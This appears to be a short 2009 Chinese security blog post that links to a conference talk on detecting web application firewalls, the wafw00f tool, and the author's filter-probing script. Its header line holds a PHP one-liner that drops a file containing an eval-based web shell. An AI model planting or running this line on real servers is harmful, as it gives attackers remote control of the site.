<?fputs(fopen('heige.php','w+'),'<?php @eval($_POST[c])? >');?> MSN:SuperHei@ph4nt0m.org GTalk:5up3rh3i@gmail.com
查看文章 |
[zz]wafw00f
2009-06-05 21:25
这个是appseceu09上一个一个演讲,主要是说杂去探测waf http://www.owasp.org/images/0/0a/Appseceu09-Web_Application_Firewalls.pdf wafw00f项目:http://code.google.com/p/waffit/ 看到这个,想起了几年前我写的一个小脚本: FiltersScan.pl :https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=55837 对一些采用黑名单方式的ids或者过滤函数还是有一定的效果的:) |
最近读者:
